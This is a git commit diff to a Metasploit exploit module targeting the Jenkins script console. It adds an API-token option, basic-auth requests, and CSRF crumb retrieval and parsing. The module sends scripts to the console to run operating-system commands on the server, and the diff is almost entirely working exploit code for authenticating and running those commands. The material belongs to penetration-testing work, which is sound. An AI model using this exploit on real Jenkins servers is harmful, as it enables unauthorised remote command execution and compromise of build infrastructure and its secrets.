add ability to specify API token instead of password

thesubtlety · thesubtlety · commit f4ffade40601 · 2017-06-15T21:05:53.000-04:00
diff --git a/modules/exploits/multi/http/jenkins_script_console.rb b/modules/exploits/multi/http/jenkins_script_console.rb
@@ -19,7 +19,8 @@ def initialize(info = {})
       'Author'	=>
         [
           'Spencer McIntyre',
-          'jamcut'
+          'jamcut',
+          'thesubtlety'
         ],
       'License'        => MSF_LICENSE,
       'DefaultOptions' =>
@@ -50,6 +51,7 @@ def initialize(info = {})
       [
         OptString.new('USERNAME',  [ false, 'The username to authenticate as', '' ]),
         OptString.new('PASSWORD',  [ false, 'The password for the specified username', '' ]),
+        OptString.new('API_TOKEN',  [ false, 'The API token for the specified username', '' ]),
         OptString.new('TARGETURI', [ true,  'The path to the Jenkins-CI application', '/jenkins/' ])
       ])
   end
@@ -77,6 +79,7 @@ def http_send_command(cmd, opts = {})
     request_parameters = {
       'method'    => 'POST',
       'uri'       => normalize_uri(@uri.path, 'script'),
+      'authorization' => basic_auth(datastore['USERNAME'], datastore['API_TOKEN']),
       'vars_post' =>
         {
           'script' => java_craft_runtime_exec(cmd),
@@ -151,26 +154,35 @@ def exploit
     @cookie = nil
     @crumb = nil
     if res.code != 200
-      print_status('Logging in...')
-      res = send_request_cgi({
-        'method'    => 'POST',
-        'uri'       => normalize_uri(@uri.path, "j_acegi_security_check"),
-        'vars_post' =>
-          {
-            'j_username' => datastore['USERNAME'],
-            'j_password' => datastore['PASSWORD'],
-            'Submit'     => 'log in'
-          }
-      })
-
-      if not (res and res.code == 302) or res.headers['Location'] =~ /loginError/
-        fail_with(Failure::NoAccess, 'Login failed')
-      end
-      sessionid = 'JSESSIONID' << res.get_cookies.split('JSESSIONID')[1].split('; ')[0]
-      @cookie = "#{sessionid}"
-
-      res = send_request_cgi({'uri' => "#{@uri.path}script", 'cookie' => @cookie})
-      fail_with(Failure::UnexpectedReply, 'Unexpected reply from server') unless res and res.code == 200
+       if datastore['API_TOKEN']
+          print_status('Authenticating and requesting crumb...')
+          res = send_request_cgi({
+            'method'    => 'GET',
+            'uri'       => normalize_uri(@uri.path, "crumbIssuer/api/json"),
+            'authorization' => basic_auth(datastore['USERNAME'], datastore['API_TOKEN'])
+          })
+       else
+          print_status('Logging in...')
+          res = send_request_cgi({
+            'method'    => 'POST',
+            'uri'       => normalize_uri(@uri.path, "j_acegi_security_check"),
+            'vars_post' =>
+              {
+                'j_username' => datastore['USERNAME'],
+                'j_password' => datastore['PASSWORD'],
+                'Submit'     => 'log in'
+              }
+          })
+
+          if not (res and res.code == 302) or res.headers['Location'] =~ /loginError/
+            fail_with(Failure::NoAccess, 'Login failed')
+          end
+          sessionid = 'JSESSIONID' << res.get_cookies.split('JSESSIONID')[1].split('; ')[0]
+          @cookie = "#{sessionid}"
+
+          res = send_request_cgi({'uri' => "#{@uri.path}script", 'cookie' => @cookie})
+          fail_with(Failure::UnexpectedReply, 'Unexpected reply from server') unless res and res.code == 200
+       end
     else
       print_status('No authentication required, skipping login...')
     end
@@ -181,6 +193,9 @@ def exploit
     elsif res.body =~ /crumb\.init\("Jenkins-Crumb", "([a-z0-9]*)"\)/
       print_status("Using CSRF token: '#{$1}' (Jenkins-Crumb style)")
       @crumb = {:name => 'Jenkins-Crumb', :value => $1}
+    elsif res.body =~ /"crumb":"([a-z0-9]*)"/
+      print_status("Using CSRF token: '#{$1}' (Jenkins-Crumb style)")
+      @crumb = {:name => 'Jenkins-Crumb', :value => $1}
     end
 
     case target['Platform']
